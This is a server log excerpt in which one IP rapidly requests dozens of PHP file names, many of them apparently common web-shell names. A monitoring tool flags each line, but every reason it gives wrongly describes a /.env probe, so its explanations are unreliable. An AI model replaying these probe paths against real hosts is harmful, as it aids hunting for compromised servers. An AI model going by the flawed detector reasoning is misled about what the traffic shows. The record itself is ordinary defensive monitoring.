Line=2026-03-20T09:11:35.544879055Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /a4.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382106 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.615681121Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /a4.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382131 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.682880848Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /1.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382170 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.750997687Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /1.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382192 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:35.818431669Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /b.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382213 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.886933342Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /b.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.957824234Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /hots.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382283 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.025787821Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /hots.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382310 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:36.119051167Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /wp-the.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382336 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.195784053Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /wp-the.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382363 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.262824671Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /kj.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382390 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.337066278Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /kj.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.405767 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:36.404885551Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /a5.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.472953 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.472521764Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /a5.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.540070 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.539792822Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /44.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.607857 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.607624470Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /44.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.674960 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:36.674718241Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /public/ws49.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.742619 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.742366608Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /public/ws49.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.819367 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.819094984Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /xxw.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.887000 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:36.886767218Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /xxw.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.962482 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:36.962219819Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /sa.php7 HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.030296 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.030021066Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /sa.php7 HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.099518 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.099216557Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /ms-edit.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.167281 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.166986911Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /ms-edit.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.234521 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:37.234266703Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp9.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.305922 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.305672621Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp9.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.373203 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.372906471Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wen.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.441573 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.441323742Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wen.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.508808 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:37.508369778Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp5.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.577542 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.577293596Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp5.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.645039 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.644720516Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /varb.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.712548 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.712286079Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /varb.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.779687 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:37.779427062Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /tt.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.850826 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.850569692Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /tt.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.918138 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.917878294Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /gettest.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.985945 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.985691948Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /gettest.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.053269 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:38.053006499Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /vx.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.122040 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.121770126Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /vx.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.189238 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.188973173Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /abrand.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.257293 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.257034199Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /abrand.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.353809 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:38.353520727Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /8573.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.421571 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.421325370Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /8573.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.490872 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.490567716Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /bolt.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.558497 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.558239302Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /bolt.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.625618 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:38.625362718Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /tfm.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.693767 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.693530573Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /tfm.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.761206 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.760928953Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /lm15.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.831458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.831153959Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /lm15.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.898481 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:38.898235213Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.966207 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.965937013Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.033404 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.033108109Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET //nw.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.103012 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.102757026Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET //nw.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.170810 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:39.170557017Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /bnm.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.238627 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.238393159Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /bnm.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.307548 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.307268135Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /nw.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.408339 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.408073628Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /nw.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.475534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:39.475281869Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /s.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.543653 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.543395888Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /s.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.610835 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.610557381Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /hplfuns.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.678610 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.678324741Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /hplfuns.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.745859 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:39.745564630Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /jp.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.814256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.813963272Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /jp.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.881367 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 